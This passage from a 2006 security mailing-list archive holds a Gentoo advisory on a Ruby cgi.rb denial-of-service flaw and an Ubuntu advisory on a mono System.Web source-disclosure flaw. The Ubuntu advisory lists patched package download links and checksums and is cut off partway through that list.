        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4809

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-20.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061220/c9575369/attachment.bin 

From falco at gentoo.org  Wed Dec 20 20:24:38 2006
From: falco at gentoo.org (Raphael Marichez)
Date: Wed, 20 Dec 2006 21:24:38 +0100
Subject: [Full-disclosure] [ GLSA 200612-21 ] Ruby: Denial of Service
	vulnerability
Message-ID: <20061220202438.GE32669@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Ruby: Denial of Service vulnerability
      Date: December 20, 2006
      Bugs: #157048
        ID: 200612-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Ruby cgi.rb CGI library is vulnerable to a Denial of Service
attack.

Background
==========

Ruby is a dynamic, open source programming language with a focus on
simplicity and productivity.

Affected packages
=================

    -------------------------------------------------------------------
     Package        /  Vulnerable  /                        Unaffected
    -------------------------------------------------------------------
  1  dev-lang/ruby     < 1.8.5_p2                          >= 1.8.5_p2

Description
===========

The read_multipart function of the CGI library shipped with Ruby
(cgi.rb) does not properly check boundaries in MIME multipart content.
This is a different issue than GLSA 200611-12.

Impact
======

The vulnerability can be exploited by sending the cgi.rb library a
crafted HTTP request with multipart MIME encoding that contains a
malformed MIME boundary specifier. Successful exploitation of the
vulnerability causes the library to go into an infinite loop.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Ruby users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/ruby-1.8.5_p2"

References
==========

  [ 1 ] CVE-2006-6303
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6303

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-21.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061220/e59f2584/attachment.bin 

From kees at ubuntu.com  Wed Dec 20 21:46:26 2006
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 20 Dec 2006 13:46:26 -0800
Subject: [Full-disclosure] [USN-397-1] mono vulnerability
Message-ID: <20061220214626.GY7242@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-397-1          December 20, 2006
mono vulnerability
CVE-2006-6104
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mono-classlib-1.0                        1.1.13.6-0ubuntu3.2
  mono-classlib-2.0                        1.1.13.6-0ubuntu3.2

Ubuntu 6.10:
  libmono-system-web1.0-cil                1.1.17.1-1ubuntu7.1
  libmono-system-web2.0-cil                1.1.17.1-1ubuntu7.1

After a standard system upgrade you need to restart any mono web 
applications to effect the necessary changes.

Details follow:

Jose Ramon Palanco discovered that the mono System.Web class did not 
consistently verify local file paths.  As a result, the source code for 
mono web applications could be retrieved remotely, possibly leading to 
further compromise via the application's source.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.2.diff.gz
      Size/MD5:    48871 95da1c90d723f6849f6996a12a60cbc6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.2.dsc
      Size/MD5:     1047 21557fc891cfdb0a9af47451010c218a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6.orig.tar.gz
      Size/MD5: 18217583 330cc66c6a44525950daf10c4f17c10e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-assemblies-base_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:    42032 11c561430b9d35ebc4c62f5d8982250e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-1.0-dbg_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:  3794836 6d7e9dad1a8f98a9e5c9fc704148cc53
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-1.0_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:  4560128 21602e7ff91b1f711873011ed7d87f66
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-classlib-2.0-dbg_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:  4568456 9c30b6dcba099ea96eb4f9e8c618a3cc
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-2.0_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:  5218186 f9f6fb451a766a1afa3ad0022f9252a9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gac_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:    53264 568d945f286aa77f4bf1a0101c1554bf
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gmcs_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:   841102 75142252d7637d54a44da37414090189
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-mcs_1.1.13.6-0ubuntu3.2_all.deb
      Size/MD5:  1415842 9e8b5ae50e7644763308cbe6096c35d8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:  1127690 1b4c2d97b84c0864a5b101709172ec9e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:   866072 b1f3fd709caa15cd2c54c4953fe1668f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:   115972 6beabaca2a334afb123d602f950dc004
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:    42066 17bfdcd4a86f4e5e9c033d14d6fa1384
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:    57624 5262d467e37ba718996a0b057b9b5c85
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:    12924 69deab0d023bfcdedff49c8c9e0fe316
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:  1117590 28380154c21bd7dad17f361555d84af8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.2_amd64.deb
      Size/MD5:     1214 0ed2e4b1b5b975d6850458d0d7be67be

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:  1017346 b5cf785db92bcdf2ec66e88f649359e3
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:   780556 601d21535e3baa5f02124fcebf545006
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:   115534 55d7b1e8bfc0b49806ce6fbe879292d1
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:    42064 a1025dce492c6e925c4306f9a2cfa007
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:    50692 a50854b6d1df53e9b70d9f2c2566a15a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:    12724 243586247671b7faa749a4d6cd3c33a7
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:  1015004 8b9cfe5134cfe97f585080d2c571ef5b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.2_i386.deb
      Size/MD5:     1210 32d89462b5e4398db6b4807575e3b0f3

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:  1085196 acd7fc6c681501959273b01f0e510233
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:   816242 465fa119ffee6aac2d569ff7f04883f2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:   116514 26c997fe0a8ed68c66b54a00e7d52357
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:    42068 f6dfd7e19ddb761902ccfa2d9f5344ce
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:    56654 a0eb22b159b7037ea7f286148dc56c39
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:    14790 1ba1e121936d0588f4921a8481fa200e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:  1102970 6a02b9bf34da073067ec61970ec5c4c9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.2_powerpc.deb
      Size/MD5:     1214 0caf8bd6ce431b226941c62a602369cc

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:  1093072 4500d1121f03adeea62cb27d327c61f2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:   820944 7073e3ded35354f6de76e68b25bb108c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:   116092 067c29ec0dc398c4279d46004970176d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:    42064 efcdda6f00ff3539dadfb60d69eb13ee
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:    53662 51aa7729f708eb2ea4903c42bdffc143
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:    13002 cfa13256a3e43d73f82e8e9ff51d7fc3
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:  1049814 76c2214b80471d6233021f10fad0fca9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.13.6-0ubuntu3.2_sparc.deb
      Size/MD5:     1214 cbf5c0379713b9fbff6f8abc443a6a54

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.1.diff.gz
      Size/MD5:    41023 f023375eafc247cf75d0452571ec393a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.1.dsc
      Size/MD5:     2303 4c239666e467fa49eb99e2329cefd631
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1.orig.tar.gz
      Size/MD5: 19352812 072cb3de1f19cbebd6034f7a5cff1292

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    19704 415f4665cfcbf1020697fcaad74a3781
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-accessibility2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    19638 478c9b6316f4fb1e6774a784b6eb1162
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.1-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    91206 e3107aeae7dcb3c9113c17f8658ee15e
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.2-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    91268 2a82d60eca1313f98ca390d310249c67
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-c5-1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   226832 6f69ab121db51554e3be115655e97885
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-cairo1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    45284 82995c188697c5f1c22e4043c2df598b
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cairo2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    45080 527a1dcadc94992ad317d3c1c7387169
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  1845196 fce79a13a9061e1663777f51171be67f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-corlib2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  2086932 2642319f830d8ff8f94df19a397271e3
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd7.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    24042 15bff0120d4fa815f2e27d4e010287ea
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd8.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    24274 f883d9922ccfa443ba124358aa90b7d2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    64786 0621bcb4cfdbdf69af07b344e3399807
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-data-tds2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    68502 5afb4df0eee2a7c74cea0a3cced50471
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-firebirdsql1.7-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   295562 18719dfa8f62049754f405a591dc7a67
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   221734 00373852dca844ec04782c038ff14fb5
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   221588 ece3b4dc87635b8a10d89d9292283526
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-microsoft-build2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   196264 48f7563e4a9f132b0e2e589987179f54
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft7.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   272388 69a2a0193c5c6899815dede37c4abe87
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft8.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   272460 cd96cc27916215880d0bc5d12d523fe8
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   130810 f95d1d2f193b28cc03720c9c85288d6f
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   131002 25058c028f497bd536e2dd22dc06fec2
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   113192 765bf6ca38bca5438760577734649bb2
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   112682 c86c16ea72e930e158ddda1b5f54d200
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   100978 d6dbe49b7a731dc410e69fc8bd111259
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-peapi2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   101016 76df4fad22d6a36b5a05899ab9f2c734
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-relaxng1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   178548 8ce8c27c9cfe9b46066005a0defcb955
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-relaxng2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   179020 dba2968c13a7bf3d828224ddd23ca123
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   247092 e0ff3768cb9943fc0b33370bdd52fb2d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-security2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   248302 36bbbc4b14ded0afa0e951f65c156d61
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.6-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   109692 244b57cd04ea60d12940851132e85522
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip0.84-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   131906 f3bde99a2c0786ba8ad87c4d183c256b
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-sharpzip2.6-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   109778 4670af48d9dfa8ba77baf0fb889f1fc4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sharpzip2.84-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   131968 903962af278fc1cf9d4cc1dfc51eee66
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-sqlite1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    43128 b1d362169846207b08b5a2527b8877cb
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-sqlite2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    43100 dfc5aaf37ab6a1bf5c8d180e7f7f35ea
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   457190 7246bc28c92c70d5708b0a34502f1c10
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-data2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   522340 a953c525229103481063219285ed082a
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    48068 e3e5eb751ae55ad29312a228401e81a5
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    48028 3e6fac752208e6ca4dd2c42c0f586ada
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    63496 d2ea4fb9e29efa4677825afe266464e5
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    63494 99e64b84751580e777e6f7554e1458eb
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-runtime1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   118400 47f669e86356f713474d310e22ff59b2
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-runtime2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   135976 481b165e89b015f1018c9730a74e2b53
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   773126 7c3ab311fc18a7955d08a797b7bdd2b6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system-web2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  1414414 98992dbb9a8379607a2d508ef6aeb2d0
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  1747274 6cacfc2f93b9ff4a496368fbd9a20a31
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-system2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  2286404 35459134d553371940a0610cec144182
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  1364398 387b26116687f175d349726605f9061d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-winforms2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  1563772 e526e6ed11f8d1422fb85357224f3810
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono1.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   403398 c586276f6e18c50a2744d5659d807d52
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono2.0-cil_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   403468 4e2069173a529a7c7f00222e95d66620
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-classlib-1.0_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    15932 f5d0e0b1096e5eac4c96f169b0e176e4
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-classlib-2.0_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    15912 4793e87d090a46d3f7685b6d8c7da662
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gac_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    29368 bd3b18c67416199522215bce088ace8f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gmcs_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:   839480 2f4e9b0cd4759166408dbbf3fd51fc21
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-mcs_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:  1012390 11f5282cf5d033cf622861509e629a37
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-mjs_1.1.17.1-1ubuntu7.1_all.deb
      Size/MD5:    26122 20dd25afee3f83dc1e212dc2a54edbe0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:  1145618 85857b8102b3228b8726582f246bd238
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:   871482 4fcf666e9b9f0c7bb8e3e95663b275dc
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:    93458 b2514c1e1400afd2206d34cd70757457
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:    15892 998c84af3ffb55064621e67cb8bda067
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:    59986 4d773655db93dac648bee002aba38400
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:   752996 2f3ec0865a533e43a87147e642b183cd
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:    15860 ad0ebdc556e927546bec5dbb7d62b591
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:  1164930 c9bc39cc32a10441c46e27757d198e51
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.1_amd64.deb
      Size/MD5:     1260 53eed5f5714aaaaccfe1c9a74861df47

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:  1075932 b57808aa52e598c304d6d56718034bc5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:   831988 d6b3fc0b4c0fd8ea33867a54f80f380f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:    93020 51361081e622cbee1b3ba33f32cac0de
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:    15886 2b7381abbfd2e09c00bd3f32122e1028
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:    53642 019d8e834568651b9949cff6ea44f292
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:   697248 7f6db63e2fb5593c699c46717336f650
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:    15856 7114e6d2c648d93df426fe75a9ead053
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:  1107016 bfc189007e62c2637f72b12372152949
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.1_i386.deb
      Size/MD5:     1260 a8b2313e9bc6989a55ea25a909d3ff86

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:  1109028 dd4f5249b6439c99a4d5269222388059
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:   832364 da661a458e1278c34528696457ede4c3
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:    93896 5ff5eb7f165b6c2c2d82c0ab955c59a2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:    15894 17a7d78602fbac998549caac69b33227
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:    58712 74385f2f9d46556693082cf2fb6fca53
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:   716246 6a0ed7f2c72f5d18757c397e4af2fc68
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:    15862 b461f6b6676af3bd79a4dadfdda08ff2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:  1160836 81deab21481bf57def0c1108be597101
